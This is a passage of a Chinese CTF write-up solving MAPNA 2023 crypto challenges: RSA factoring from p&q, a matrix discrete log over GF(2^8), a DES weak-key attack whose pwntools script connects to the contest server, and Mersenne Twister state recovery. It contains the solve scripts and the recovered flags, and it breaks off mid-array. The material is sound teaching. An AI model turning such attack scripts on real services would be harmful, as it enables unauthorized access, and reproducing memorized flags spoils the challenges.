[MAPNA 2023] crypto/pwn 部分

继续打结束的比赛,不紧张,完成以后也可以慢慢修下代码.

Crypto

Isogenies

同源加密,没弄明白,并且没搜到WP

Shibs

RSA加密,先生成一个素数p,然后循环左移s位得到素数q给出p&q

from Crypto.Util.number import *
from flag import flag

def shift(s, B):
	assert s < len(B)
	return B[s:] + B[:s]

def gen_key(nbit):
	while True:
		p = getPrime(nbit)
		B = bin(p)[2:]
		for s in range(1, nbit):
			q = int(shift(s, B), 2)
			if isPrime(q):
				n = p * q
				return n, p, s  #s可能很小

nbit = 1024
n, p, _ = gen_key(nbit)
q = n // p
dna = p & q
m = bytes_to_long(flag)
c = pow(m, 65537, n)

print(f'n = {n}')
print(f'dna = {dna}')
print(f'enc = {c}')

原先作过一道p&(q<<1)的题,以那个为模板作些修改

from Crypto.Util.number import *

n = 20316898932195904153277570911129808751568815578115203862825426326247688399447840960418077345063791379522152467572219078649052797300815169624324245983590614914067269781160218800744443132820786495383622657350005442865119235171347222481549171383138463856866590153226706585323109487068718209302113471433380661465050751463957327192775767168671487596946840993911799696944069759277414133632444513772210700794949276020219498655982617016744321984479076362225276288530893635176013522707993482886351558163399233902562390621254309853983712254751850630385079750216639722676398376824903099579116864460998259826947136455660974737633
dna = 112981924875557500958025001180130494828271302148393893025039250618449754880107262891213034570290994460680732065864408219699255537220809236513831561599199136870056419874815435027857448315805793914961273026882116413167515833581245087132919209478091324962372324771986076010340277554904109601589334046901209670673
enc = 3045339581292945711130813005351003100918522557110757541588006962379795819964889960982006172396478992403763951169397699477604011489683403206194674478676115307579754281253958928474112104087602753563505848223560038859380782692201785087834133116953880301903767021262497807797262966215767967235011554145888668721199447563741572273525508047234141844260401652933196055533764562153454963082569500478073362290691632890264262315099050876574517869170470080069161301450816555901477760392115210762498464643598219802952797283932722013302922244300834587051779128033516492433437534261890143822056118794447406885925957834712258842422
nbit = 1024

#test
'''
nbit = 128
n = 54806273471734426848076644605552636373334768906819576755734949055415399448617
p = 189996131273799767657828044014097273591
q = 288459944443574806693489336664825208287
dna = 180792125784322614120793611349623836887
sbit = 17
'''
maps = [int(i,2) for i in bin(dna)[2:]]

def check(v0,v1):
    for i in range(nbit):
        if v0[i]!='*' and v1[i]!='*' and int(v0[i])&int(v1[i]) != maps[i]:
            return False 
    else:
        return True

def add_check(v0,v1,ii,tp):
    lv0,lv1=list(v0),list(v1)
    for i in range(nbit):
        i2 = (i-sbit)%nbit
        j2 = (i+sbit)%nbit 
        if lv0[i] != lv1[i2]:
            if lv0[i] == '*': #*0 *1
                lv0[i] = lv1[i2]
            elif lv1[i2] == '*': #0* 1*
                lv1[i2] = lv0[i]
            else:  #10 01
                #print(f"{v0}\n{v1}\n{ii} 0 {i} {i2}\n")
                return [] 
        if lv1[i] != lv0[j2]:
            if lv1[i] == '*':
                lv1[i] = lv0[j2]
            elif lv0[j2] == '*':
                lv0[j2] = lv1[i]
            else:
                #print(f"{v0}\n{v1}\n{ii} 1 {i}\n")
                return []

    tmp = []
    if tp==0:  #上边
        lv0[ii] = '0'
        if check(lv0,lv1):
            tmp.append(''.join(lv0)+''.join(lv1))
        lv0[ii] = '1'
        if check(lv0,lv1):
            tmp.append(''.join(lv0)+''.join(lv1))
    else:
        lv1[ii] = '0'
        if check(lv0,lv1):
            tmp.append(''.join(lv0)+''.join(lv1))
        lv1[ii] = '1'
        if check(lv0,lv1):
            tmp.append(''.join(lv0)+''.join(lv1))
    #print(tmp)
    return tmp  
    
    
def get_v(sp,sq):
    queue = [''.join(sp)+''.join(sq)]
    while True:
        #print(len(queue))
        tmp = []
        if len(queue)==0:
            break
        for v in queue:
            #修剪
            v0,v1 = v[:nbit],v[nbit:]
            #print(''.join(v0)+'\n'+''.join(v1))
                                
            #print(len(v))
            sv10,sv20 = int(v0.replace('*','0'),2),int(v1.replace('*','0'),2)
            sv11,sv21 = int(v0.replace('*','1'),2),int(v1.replace('*','1'),2)
            if sv10*sv20 == n:
                print(f"p = {sv10}\nq = {sv20}")
                return 
            elif sv11*sv21 == n:
                print(f"p = {sv11}\nq = {sv21}")
                return 
            elif sv10*sv20>n:
                #print('exit 1', hex(sv10),hex(sv20), sv10*sv20)
                continue 
            elif sv11*sv21<n:
                #print('exit 2', hex(sv11),hex(sv21), sv11*sv21)
                continue 
            
            #print('In')
            tp = 2
            for i in range(nbit):
                if v0[i] == '*':
                    tp = 0
                    break 
                if v1[i] == '*':
                    tp = 1 
                    break 
            else:
                if int(v0,2)*int(v1,2) == n:
                    print('p = ', int(v0,2))
                    print('q = ', int(v1,2))
                    tmp = []
                    return
                continue  #queue next 

            #print("pos:",i)
            #   i
            # s .  | ...     ..
            # ...   |   s .  
            #             j
            tmp += add_check(v0,v1,i,tp)
        queue = tmp
    
for sbit in range(1,nbit//2):
    #print(sbit)
    sp = [i if i=='1' else '*' for i in bin(dna)[2:]]
    sq = sp[sbit:] + sp[:sbit]
    for i in range(nbit):
        if sp[i] == '1' and sq[i] == '*':
            if maps[i] == 1:
                sq[i] = '1'
            else:
                sq[i] = '0'
        if sp[i] == '*' and sq[i] == '1':
            if maps[i] == 1:
                sp[i] = '1'
            else:
                sp[i] = '0'
    #print(''.join(sp)+'\n'+''.join(sq))
    get_v(sp,sq)

p =  118627270647424424141514783307481285886258073029116821903046590278901771054287488093459396876753105609837026655906589077937738668295841155401318912730133481985678923364535216697903225159999957216575823849034786092435988869550296395479754426578068176634670446795305597283053006032071267819138579464710410086097
q =  171266681103878322117424575175361468379674209043813157946561665043786388947203228350875263109216690282197981858022233522587435146007011089350418152369819924630928608372164838867715907687708478655112024432448453837808032774893387899232268630799449237496392996637407630619155994281854191089804529710230573475089
long_to_bytes(pow(enc, inverse(65537,(p-1)*(q-1)), n))
#b'MAPNA{Br4nch_&_prun3_Or_4Nother_ApprOacH???}'

GLNQ

基于矩阵的DLP问题,但是以伽瓦罗域的形式给出的矩阵

from Crypto.Util.number import *
from flag import flag

F, k = GF(2**8), 14

while True:
	G = random_matrix(F, k)
	if G.is_invertible():
		break

flag = flag.lstrip(b'MAPNA{').rstrip(b'}')
m = bytes_to_long(flag)  #m = int(flag) 给的有问题
H = G ** m

print(f'G = {G}')
print(f'H = {H}')
G =[[            x^7 + x^6 + x^4 + x^3 + x^2,                               x^7 + x^6 + x^2,                               x^5 + x^4 + x^3,                                        x^3 + x,                        x^6 + x^5 + x^3 + x^2,                   x^5 + x^4 + x^3 + x^2 + x,               x^7 + x^6 + x^5 + x^3 + x + 1,                                      x^4 + x^3,                               x^7 + x^5 + x^4,                                 x^7 + x^2 + x,                          x^5 + x^4 + x^2 + x,               x^7 + x^6 + x^4 + x^3 + x + 1,                          x^7 + x^5 + x^3 + x,                    x^6 + x^4 + x^3 + x^2 + 1],
[                              x^7 + x^5 + x^4,                                 x^7 + x^3 + x,               x^7 + x^4 + x^3 + x^2 + x + 1,                               x^5 + x^4 + x^3,                   x^6 + x^4 + x^3 + x^2 + x,                                         x^4 + 1,                                    x^5 + x + 1,      x^7 + x^6 + x^5 + x^4 + x^3 + x^2 + 1,                             x^7 + x^6 + x + 1,                    x^7 + x^6 + x^5 + x^2 + 1,                          x^4 + x^3 + x^2 + x,                                      x^6 + x^2,                                      x^7 + x^6,                               x^7 + x^5 + x^4],
[                                 x^7 + x^4 + 1,                   x^5 + x^4 + x^3 + x^2 + x,                                    x^6 + x + 1,                           x^6 + x^3 + x^2 + 1,                    x^6 + x^4 + x^3 + x^2 + 1,                                               x,                      x^5 + x^3 + x^2 + x + 1,                   x^6 + x^5 + x^3 + x^2 + x,                        x^7 + x^5 + x^4 + x^3,                                      x^5 + x^2,                                    x^2 + x + 1,                               x^7 + x^6 + x^4,                    x^7 + x^5 + x^4 + x^2 + 1, x^7 + x^6 + x^5 + x^4 + x^3 + x^2 + x + 1],
[           x^7 + x^5 + x^4 + x^3 + x^2 + x,                   x^7 + x^6 + x^4 + x^2 + x,                           x^5 + x^3 + x^2 + 1,                          x^7 + x^5 + x^3 + x,                      x^6 + x^4 + x^3 + x + 1,                           x^7 + x^6 + x^2 + 1,                                      x^7 + x^2,                                  x^4 + x^3 + 1,               x^7 + x^6 + x^3 + x^2 + x + 1,               x^7 + x^4 + x^3 + x^2 + x + 1,                    x^7 + x^5 + x^4 + x^2 + 1,                          x^6 + x^4 + x^2 + x,        x^7 + x^5 + x^4 + x^3 + x^2 + x + 1,               x^7 + x^6 + x^3 + x^2 + x + 1],
[                  x^7 + x^5 + x^4 + x^2 + x,                   x^5 + x^4 + x^3 + x^2 + x,                                      x^5 + x^3,                      x^5 + x^4 + x^3 + x + 1,                               x^6 + x^5 + x^3,                        x^7 + x^6 + x^5 + x^2,                           x^7 + x^6 + x^2 + 1,                                    x^5 + x + 1,                                  x^4 + x^3 + 1,                                      x^6 + x^5,                      x^5 + x^3 + x^2 + x + 1,                   x^7 + x^6 + x^4 + x^3 + x,                                      x^7 + x^2,                   x^7 + x^6 + x^5 + x^3 + x],
[              x^7 + x^5 + x^3 + x^2 + x + 1,                        x^7 + x^6 + x^4 + x^3,                                      x^7 + x^4,                    x^7 + x^6 + x^5 + x^3 + 1,                                         x^5 + 1,                    x^7 + x^4 + x^3 + x^2 + 1,                        x^5 + x^4 + x^3 + x^2,                             x^7 + x^6 + x + 1,                                    x^2 + x + 1,                                      x^7 + x^2,                                             x^5,                          x^5 + x^4 + x^2 + x,                    x^7 + x^5 + x^3 + x^2 + 1,        x^7 + x^6 + x^5 + x^4 + x^3 + x + 1],
[                          x^6 + x^4 + x^3 + 1,                                         x^6 + 1,                      x^6 + x^4 + x^3 + x + 1,                          x^5 + x^4 + x^3 + x,                                  x^5 + x^4 + 1,                             x^7 + x^4 + x + 1,                             x^7 + x^6 + x + 1,                           x^6 + x^3 + x^2 + 1,                                  x^5 + x^2 + 1,                           x^5 + x^3 + x^2 + 1,                                                0,                   x^6 + x^4 + x^3 + x^2 + x,                        x^6 + x^4 + x^3 + x^2,                                  x^4 + x^2 + 1],
[                       x^7 + x^6 + x^4 + x^3,                          x^6 + x^3 + x^2 + x,                           x^7 + x^5 + x^2 + 1,                           x^7 + x^6 + x^2 + 1,                                 x^7 + x^6 + x,                                  x^6 + x^3 + 1,                   x^7 + x^6 + x^3 + x^2 + x,                      x^7 + x^5 + x^2 + x + 1,                      x^6 + x^4 + x^3 + x + 1,               x^7 + x^4 + x^3 + x^2 + x + 1,                                             x^5,                           x^7 + x^6 + x^4 + 1,                               x^6 + x^5 + x^4,                           x^7 + x^5 + x^4 + 1],
[                          x^7 + x^5 + x^2 + 1,                           x^6 + x^5 + x^2 + 1,               x^7 + x^6 + x^4 + x^2 + x + 1,                                  x^6 + x^5 + 1,                                  x^6 + x^4 + 1,                                                0,                 x^7 + x^6 + x^5 + x^4 + x^3,                           x^5 + x^4 + x^2 + 1,                        x^7 + x^6 + x^5 + x^3,                             x^5 + x^4 + x + 1,               x^7 + x^6 + x^4 + x^2 + x + 1,                                      x^6 + x^2,                               x^7 + x^6 + x^3,                                  x^4 + x^3 + 1],
[                              x^7 + x^6 + x^3,                                         x^7 + 1,                        x^6 + x^5 + x^4 + x^2,                           x^5 + x^4 + x^2 + 1,                      x^7 + x^6 + x^4 + x + 1, x^7 + x^6 + x^5 + x^4 + x^3 + x^2 + x + 1,                                      x^6 + x^3,                           x^7 + x^3 + x^2 + 1,                                               x,                      x^5 + x^4 + x^2 + x + 1,                      x^6 + x^5 + x^3 + x + 1,                        x^7 + x^6 + x^3 + x^2,                               x^5 + x^3 + x^2,                             x^5 + x^4 + x + 1],
[                                               0,                   x^6 + x^5 + x^4 + x^3 + x,        x^7 + x^5 + x^4 + x^3 + x^2 + x + 1,                 x^7 + x^6 + x^5 + x^4 + x^2,                             x^5 + x^3 + x + 1,                      x^7 + x^5 + x^4 + x + 1,                               x^7 + x^5 + x^4,        x^6 + x^5 + x^4 + x^3 + x^2 + x + 1,                    x^7 + x^6 + x^5 + x^2 + 1,                               x^5 + x^4 + x^3,        x^7 + x^6 + x^5 + x^3 + x^2 + x + 1,            x^7 + x^6 + x^4 + x^3 + x^2 + x,                                  x^7 + x^4 + 1,                    x^6 + x^5 + x^4 + x^2 + 1],
[                                       x^3 + x,                                         x^3 + 1,                             x^4 + x^3 + x + 1,                                  x^5 + x^3 + 1,                        x^7 + x^6 + x^5 + x^2,                   x^7 + x^6 + x^4 + x^2 + x,                          x^6 + x^5 + x^4 + x,                                         x^6 + 1,                   x^7 + x^6 + x^3 + x^2 + x,                               x^7 + x^3 + x^2,                                             x^4,                   x^6 + x^5 + x^4 + x^3 + x,                               x^6 + x^5 + x^2,                      x^5 + x^3 + x^2 + x + 1],
[            x^7 + x^6 + x^5 + x^3 + x^2 + 1,                                 x^7 + x^3 + x,                                             x^5,                          x^6 + x^5 + x^2 + x,        x^7 + x^6 + x^4 + x^3 + x^2 + x + 1, x^7 + x^6 + x^5 + x^4 + x^3 + x^2 + x + 1,                                 x^7 + x^4 + x,                      x^7 + x^5 + x^4 + x + 1,                             x^6 + x^4 + x + 1,             x^7 + x^6 + x^5 + x^4 + x^2 + 1,                          x^7 + x^6 + x^5 + x,                   x^7 + x^5 + x^3 + x^2 + x,               x^7 + x^6 + x^5 + x^2 + x + 1,               x^6 + x^5 + x^4 + x^3 + x + 1],
[                                 x^6 + x^4 + 1,                               x^6 + x^3 + x^2,                          x^6 + x^5 + x^3 + x,                 x^7 + x^6 + x^5 + x^3 + x^2,                               x^6 + x^5 + x^2,                    x^6 + x^5 + x^3 + x^2 + 1,                          x^6 + x^3 + x^2 + x,                             x^7 + x^3 + x + 1,               x^7 + x^4 + x^3 + x^2 + x + 1,                                    x^3 + x + 1,                               x^6 + x^4 + x^2,                                      x^7 + x^4,                   x^6 + x^5 + x^4 + x^2 + x,                    x^6 + x^5 + x^3 + x^2 + 1]]

H =[[               x^7 + x^3 + x^2 + 1 ,                          x^4 + x^3 + 1  ,                 x^6 + x^4 + x^3 + x,             x^6 + x^5 + x^4 + x^2 + 1,     x^7 + x^5 + x^4 + x^3 + x^2 + x,                                      x^6,                           x^4 + x^3 + 1,                 x^6 + x^5 + x^4 + x^3,                        x^6 + x^5 + x^3,                      x^7 + x^5 + x + 1,                   x^6 + x^4 + x^3 + x,            x^7 + x^6 + x^4 + x^3 + x,                   x^6 + x^4 + x^2 + x,        x^7 + x^6 + x^3 + x^2 + x + 1],
[                         x^6 + x^2 + x ,                  x^6 + x^5 + x^3 + x  ,               x^6 + x^5 + x^4 + x^2,                      x^7 + x^5 + x + 1,        x^7 + x^6 + x^5 + x^4 + x + 1,               x^6 + x^5 + x^2 + x + 1,                             x^7 + x + 1,                                  x^2 + 1,                               x^5 + x^2,   x^7 + x^6 + x^5 + x^4 + x^3 + x^2,                      x^5 + x^2 + x + 1,                      x^5 + x^2 + x + 1,             x^6 + x^5 + x^4 + x^2 + 1,                      x^7 + x^2 + x + 1],
[           x^6 + x^5 + x^4 + x^3 + x ,                     x^6 + x^4 + x + 1  ,                             x^7 + x^6,      x^7 + x^6 + x^4 + x^3 + x^2 + 1,                      x^5 + x^2 + x + 1,             x^7 + x^6 + x^4 + x^3 + 1,                 x^7 + x^6 + x^4 + x^2,                 x^5 + x^4 + x^3 + x^2,                                    x + 1,             x^6 + x^4 + x^3 + x^2 + 1,                                  x^2 + 1, x^7 + x^5 + x^4 + x^3 + x^2 + x + 1,                               x^7 + x^6,                           x^7 + x^3 + 1],
[                x^7 + x^4 + x^3 + x^2 ,     x^7 + x^6 + x^5 + x^4 + x^2 + 1  ,             x^7 + x^5 + x^2 + x + 1,                               x^3 + x^2,                        x^4 + x^3 + x^2,            x^5 + x^4 + x^3 + x^2 + x,                      x^7 + x^4 + x + 1,             x^7 + x^4 + x^3 + x^2 + 1,                                 x^4 + x, x^7 + x^6 + x^5 + x^4 + x^3 + x + 1,                        x^6 + x^5 + x^2,               x^7 + x^6 + x^3 + x + 1,               x^6 + x^4 + x^3 + x + 1,                          x^7 + x^3 + x],
[            x^7 + x^6 + x^5 + x^4 + 1 ,                   x^5 + x^3 + x^2 + 1  ,                               x^4 + x,                    x^6 + x^5 + x^4 + 1,                                      x^6,                    x^7 + x^5 + x^2 + 1,               x^7 + x^6 + x^2 + x + 1,            x^7 + x^5 + x^3 + x^2 + x,                      x^7 + x^3 + x + 1,                    x^7 + x^5 + x^3 + 1,                           x^7 + x^4 + 1,                   x^7 + x^4 + x^3 + x,                    x^6 + x^5 + x^4 + 1,                 x^6 + x^5 + x^4 + x^3],
[                   x^7 + x^4 + x^2 + 1 ,                              x^5 + x^3  ,        x^7 + x^6 + x^4 + x^3 + x^2,                          x^7 + x^4 + x,          x^7 + x^6 + x^4 + x^3 + x^2,                    x^5 + x^4 + x^3 + 1,                      x^3 + x^2 + x + 1,        x^6 + x^5 + x^4 + x^2 + x + 1,                                  x^6 + 1,                               x^3 + x^2,             x^7 + x^5 + x^4 + x^2 + 1,        x^7 + x^5 + x^4 + x^3 + x + 1,        x^5 + x^4 + x^3 + x^2 + x + 1, x^7 + x^6 + x^5 + x^3 + x^2 + x + 1],
[                       x^7 + x^6 + x^5 ,                       x^6 + x^5 + x^3  ,                 x^6 + x^5 + x^3 + x,                               x^5 + x^4,                   x^7 + x^5 + x^4 + x,                                      x^2,                                      x^6,                                  x^6 + 1,                 x^7 + x^5 + x^4 + x^3,                               x^7 + x^2,               x^7 + x^3 + x^2 + x + 1,      x^7 + x^6 + x^4 + x^3 + x^2 + 1,               x^7 + x^6 + x^2 + x + 1,        x^7 + x^6 + x^3 + x^2 + x + 1],
[                   x^7 + x^5 + x^3 + 1 ,              x^6 + x^3 + x^2 + x + 1  ,           x^6 + x^5 + x^3 + x^2 + 1,                      x^3 + x^2 + x + 1,                        x^7 + x^3 + x^2,                                      x^2,               x^6 + x^5 + x^4 + x + 1,                           x^3 + x^2 + 1, x^7 + x^6 + x^5 + x^4 + x^3 + x + 1,                               x^6 + x^3,                    x^7 + x^5 + x^4 + 1,                             x^4 + x + 1,                           x^5 + x^4 + 1,             x^5 + x^4 + x^3 + x^2 + 1],
[       x^7 + x^6 + x^4 + x^2 + x + 1 ,                         x^6 + x^3 + x  ,          x^6 + x^5 + x^3 + x^2 + x,                           x^4 + x^2 + 1,                               x^6 + x^2,                          x^6 + x^3 + x,                   x^6 + x^4 + x^3 + x,            x^5 + x^4 + x^3 + x^2 + x,                        x^7 + x^6 + x^2,                                  x^2 + 1,                        x^6 + x^5 + x^4,                    x^7 + x^6 + x^3 + 1,            x^7 + x^6 + x^5 + x^2 + x,                    x^7 + x^6 + x^3 + 1],
[                x^7 + x^6 + x^3 + x^2 ,                   x^7 + x^5 + x^3 + 1  ,                  x^7 + x^6 + x^3 + 1, x^7 + x^6 + x^4 + x^3 + x^2 + x + 1,                    x^4 + x^3 + x^2 + 1,                               x^7 + x^3,             x^6 + x^4 + x^3 + x^2 + 1,                             x^2 + x + 1,                 x^7 + x^6 + x^3 + x^2,                   x^6 + x^5 + x^3 + x,                        x^4 + x^3 + x^2, x^7 + x^6 + x^5 + x^4 + x^2 + x + 1,                      x^6 + x^2 + x + 1,        x^6 + x^5 + x^4 + x^3 + x + 1],
[                       x^7 + x^6 + x^5 ,     x^6 + x^5 + x^4 + x^3 + x^2 + 1  ,                  x^7 + x^5 + x^2 + 1,                                      x^3, x^7 + x^6 + x^5 + x^4 + x^2 + x + 1,             x^7 + x^4 + x^3 + x^2 + 1,                           x^7 + x^4 + 1,                 x^7 + x^5 + x^4 + x^2,                    x^4 + x^3 + x^2 + 1,     x^6 + x^5 + x^4 + x^3 + x^2 + x,            x^6 + x^4 + x^3 + x^2 + x,               x^7 + x^6 + x^2 + x + 1,             x^6 + x^4 + x^3 + x^2 + 1,                   x^5 + x^4 + x^2 + x],
[                                 x^3 + 1 ,                   x^7 + x^3 + x^2 + 1  ,             x^7 + x^6 + x^2 + x + 1,                             x^6 + x + 1,          x^7 + x^5 + x^4 + x^3 + x^2,                 x^7 + x^6 + x^5 + x^2,                          x^7 + x^3 + x, x^7 + x^6 + x^4 + x^3 + x^2 + x + 1,                          x^4 + x^3 + x,                                  x^7 + 1,               x^7 + x^5 + x^2 + x + 1,                               x^6 + x^2,                                  x^4 + 1,     x^7 + x^6 + x^5 + x^4 + x^3 + x],
[x^7 + x^6 + x^5 + x^3 + x^2 + x + 1 ,           x^7 + x^5 + x^4 + x^2 + x  ,                             x^7 + x^4,               x^5 + x^3 + x^2 + x + 1,                               x^6 + x^4,                               x^6 + x^2,                    x^7 + x^6 + x^2 + 1,                   x^7 + x^6 + x^2 + x,               x^5 + x^4 + x^2 + x + 1,                               x^6 + x^3,        x^7 + x^4 + x^3 + x^2 + x + 1,        x^7 + x^6 + x^5 + x^3 + x + 1,                                         0,                           x^7 + x^3 + 1],
[                  x^6 + x^5 + x^2 + x ,                          x^3 + x^2 + 1  ,                 x^5 + x^4 + x^2 + x,                   x^6 + x^4 + x^2 + x,      x^7 + x^6 + x^5 + x^4 + x^3 + 1,        x^7 + x^6 + x^4 + x^2 + x + 1,                    x^7 + x^6 + x^2 + 1,                      x^6 + x^2 + x + 1,      x^7 + x^6 + x^5 + x^4 + x^3 + 1,                   x^7 + x^6 + x^2 + x,                    x^7 + x^5 + x^4 + 1,                                      x^6,                           x^4 + x^3 + 1,                          x^6 + x^3 + x]]

 经问师傅,得到两种生成矩阵的方法

#方法1
R = GF(2^8)
G = matrix(GF(2^8),14)
G[i,j] = R('z8^3 + 1')

#方法2
R = GF(2^8)
z8 = R.gen()
G = matrix([[z8^3+1,...],...])

然后还得到解法,在sagemath 10.0,discrete_log函数可以一个带算法参数的algorithm='lambda'

可以直接使用网上在线求 Sage Cell Server

if G.is_invertible():
    m = discrete_log(H, G,algorithm='lambda')
    assert H==G**m, 'not-yet'
    print(m)
else:
    print('no')

#6424379811053277573417442136
#MAPNA{6424379811053277573417442136}

 不过题目的bytes_to_long似乎是int,根据网上的WP确实不需要long_to_bytes回去.

Be Fast🏃

远程用DES进行加密,密钥由用户输入,一共14个,最后一个加上循环左移一位重复7次加上后7个密钥一共生成21个密码,再用这些密码对数据进行加密,要求在短时间内根据密文求出明文.

#!/usr/bin/env python3

from random import *
from binascii import *
from Crypto.Cipher import DES
from signal import *
import sys, os
from flag import flag

def die(*args):
	pr(*args)
	quit()

def pr(*args):
	s = " ".join(map(str, args))
	sys.stdout.write(s + "\n")
	sys.stdout.flush()

def sc():
	return sys.stdin.buffer.readline()

def shift(msg, l):
	assert l < len(msg)
	return msg[l:] + msg[:l]

def pad(text):
	if len(text) % 8 != 0:
		text += (b'\xff' * (8 - len(text) % 8))
	return text

def encrypt(msg, key):
	msg = pad(msg)
	assert len(msg) % 8 == 0
	assert len(key) == 8
	des = DES.new(key, DES.MODE_ECB)
	enc = des.encrypt(msg)
	return enc

def main():
	border = "+"
	pr(border*72)
	pr(border, ".::        Hi all, you should be fast, I mean super fact!!       ::.", border)
	pr(border, "You should send twenty 8-byte keys to encrypt the secret message and", border)
	pr(border, "just decrypt the ciphertext to get the flag, Are you ready to start?", border)
	pr(border*72)

	secret_msg = b'TOP_SECRET:' + os.urandom(40)
	
	cnt, STEP, KEYS = 0, 14, []
	md = 1

	while True:
		pr(border, "please send your key as hex: ")
		alarm(md + 1)
		ans = sc().decode().strip()
		alarm(0)
		try:
			key = unhexlify(ans)
			if len(key) == 8 and key not in KEYS:
				KEYS += [key]
				cnt += 1
			else:
				die(border, 'Kidding me!? Bye!!')
		except:
			die(border, 'Your key is not valid! Bye!!')
		if len(KEYS) == STEP:
			print(KEYS)
			HKEY = KEYS[:7]
			shuffle(HKEY)
			NKEY = KEYS[-7:]
			shuffle(NKEY)
			for h in HKEY: NKEY = [key, shift(key, 1)] + NKEY  #[A,shift_A]*7 + [xxx]
			enc = encrypt(secret_msg, NKEY[0])
			for key in NKEY[1:]:
				enc = encrypt(enc, key)
			pr(border, f'enc = {hexlify(enc)}')
			pr(border, f'Can you guess the secret message? ')
			alarm(md + 1)
			msg = sc().strip()
			alarm(0)
			if msg == hexlify(secret_msg):
				die(border, f'Congrats, you deserve the flag: {flag}')
			else:
				die(border, f'Sorry, your input is incorrect! Bye!!')

if __name__ == '__main__':
	main()

由于循环左移一字节当输入相同的8字符时与原密钥相同,并且DES是8字节块加密,所以可以用已知固定的头和密钥的全排列生成字典,通过密文查字典得到正确的密钥顺序现解密.

import itertools
from Crypto.Cipher import DES

def encrypt(enc,keys):
    for v in keys:
        des = DES.new((v*8).encode(), DES.MODE_ECB)
        enc = des.encrypt(enc)
    return enc

def decrypt(enc,keys):
    for v in keys:
        des = DES.new((v*8).encode(), DES.MODE_ECB)
        enc = des.decrypt(enc)
    return enc

enc0 = b'TOP_SECR'

dic = {}
key = '1234567'
for v in itertools.permutations(key):
    t1 = '7'*14+''.join(v)
    v2 = encrypt(enc0,t1)
    dic[v2.hex()] = t1
    #print(v2.hex(),t1)

print('-'*20)
print('Total:', len(dic))


#-----------------------
#输入的key
from pwn import *

p = remote('3.75.180.117', 37773)
context.log_level = 'debug'
v = 'abcdefg1234567'

for i in v:
    p.sendlineafter(b'+ please send your key as hex: \n', (i*8).encode().hex().encode())

p.recvuntil(b"+ enc = b'")
enc = p.recvline().strip()[:-1].decode()
key = dic[enc[:16]]
print(enc[:16], key, enc)
msg = decrypt(bytes.fromhex(enc), key[::-1])
print(msg)

p.sendlineafter(b'+ Can you guess the secret message? \n', msg[:-5].hex().encode())
p.recvline()
p.recvline()
p.interactive()

#enc = '379cfa337a483e0a9073efdb0b424b501a29f9cdaf3c2e709303a006f61665bf27aa29d282614aa19c3485389eb9ea5172962bb7a9e2ad37'
#MAPNA{DES_h4s_A_f3W_5pec1f!c_kEys_7eRm3d_we4K_k3Ys_And_Sem1-wE4k_KeY5!}

What next?

这题是个热身题,本意是一个梅森旋转求随机数,但是一不小心给了结果,直接异或即可,正式题是下一个.

What next II?

给了79个256位随机数,可以恢复state,然后求下几个再异或求明文.

这比赛很怪,第1题巨难几乎无人能解,然后越来越简单

#!/usr/bin/env python3

from random import *
from Crypto.Util.number import *
from flag import flag

def encrypt(msg, KEY):
	m = bytes_to_long(msg)
	c = KEY ^ m
	return c

n = 80
TMP = [getrandbits(256) * _ ** 2 for _ in range(n)]
KEY = sum([getrandbits(256 >> _) ** 2 for _ in range(8)]) 

enc = encrypt(flag, KEY)

print(f'TMP = {TMP}')
print(f'enc = {enc}')

用那个库直接求

TMP = [0, 22330693840234311255135949029444484409546667648719176405826663892267656641027, 127168478027482847709328807841325386271927515479937061237117195618823278578116, 182258311374053859620888699680212168010665323374548870180038645090147843867373, 1120044041165490856498692287111236626472260308631093314161690677868431277653536, 1983473421395194676263973602935227753154638099492341714205203280778040675593450, 1574768551732085861078069762534699936995654652684634077104498873387111232412816, 4988773041677976257517254491234335651753610239922582254283447205154548743632904, 869738033317159039287197189670964123964466628318970710545560734535418094431872, 716771557072892076589368879721160406613516964478389692662921907034616035095047, 2841054733362182186252458286741823726277405165099408732758691872324732479956600, 6200268989316199565071790593244237980113705529543497656127585449937778556282311, 10670728743047162087774896911955052588177734200772863764402582886370432879158720, 7713906922622752752151916696524419287963819641354815269293605765422900017233866, 13689077681405838115291939958594572280593102467042881661528817316126253635857444, 23677404931618939684375357302211056316481456538100460743428412550112769975941300, 22334702277647520331031971258896634990832479997228972554803329027443498276011264, 24695994670269108821474844143270568317378271123560130717104045624895774803117988, 10726839246587772223823222881528936091917884797218227418638385365176143122217812, 1312747277711228023681888222399668996816715931126782050057534166588569071642948, 14829434912751138825019062212374862054511849430113519894438429231649766515851600, 4917180643387964007287001238070594020985844865025196727991425387470641537875518, 50772176246766546694026388399540445347088279634906123947563600159509306535585300, 20680598744337311676861190641592800456437920078216405214477640693225317242487078, 57560623230262776939750106414721715686651269149245752162663251361023294801081600, 63941301709699592129851769466238327968731332723117779339939586823464299930335000, 30248094445348087425063737332624900285689080519537666953907462011122884602991780, 9774708715683840095021685805936771586028623975773332766526807054152590972465402, 61228751294246951869891671407294469506401133460669313068369993608651062307301536, 41981261972157910420555352577742115252749734931422260886610665615142932761250238, 92332289648534120255700799585162857690611895814212622902006472593032842219422300, 102090694836612045964656351247645673041342905792690679450732518780700786595757872, 8465306744686231379969736050689382339949995071265316552433666241539252681451520, 114072153081233359084524715014825650254537286682603109151986752844288607088786066, 39946361462751138749261511325777846481011288953117931061771127396007551287911208, 51243479474799144289518571031495536096625532453885999576052634625243425716758700, 132356504405092579871543186323238530972479261975470487510352508943760068475015440, 109077835346013498228568867183016137777644328620298812835459712256002833220195417, 52635267919343130972014005273289555808336337947193348140410148289978267235415648, 9568343438735227407132147420705807168258684366618511035784505242511446472528193, 136103745592722122037143341370556407561964415802887285393102934361453911394982400, 15501324115571167305412632833471884183641743683875758176471163573103721210677697, 124579054262159655532164017523017564697199759561416452868759873217906475930663652, 69331433672201876294056448428159828327113921951663941374636039203754564050923557, 134825790087045765574290263555594553874136924161813224135475519279020442040026864, 127098236196925756090074171499128508507461799729629969599917408442298996799214250, 120716315173788627251671396349879537684221828425501013413665864262612928100844788, 246230945837378885729579613348413794121875158206606559652651668292953179058653508, 182436930868427241575608788617950343128628563937798409868187047670441481734494464, 2216307326510769061988701188806623458793041637834505792592287312459658319545700, 217778196427604121810125555838576095983026719310491477185297193068203986197977500, 200042153662024093707446037685450040433674498805614787040971237961725493946807124, 55096521527758008435839474651130444687406648424301616531387151625485823586357376, 315911207494925949742212443025101639383551363855632617410391325922132118052280432, 160608721274889447938606989650810386105243008009388938737103600719751998405695052, 80485718020426913778898398898436382386718914865993732581279132006386834763843750, 175256027423949464821148437330609889703365513530429385704635213979205690543187968, 312494592697141143680238564093947039458907138790072672218576868913190841311490441, 12551558878313236197845748627693664902436846005140074555532691630477757920400492, 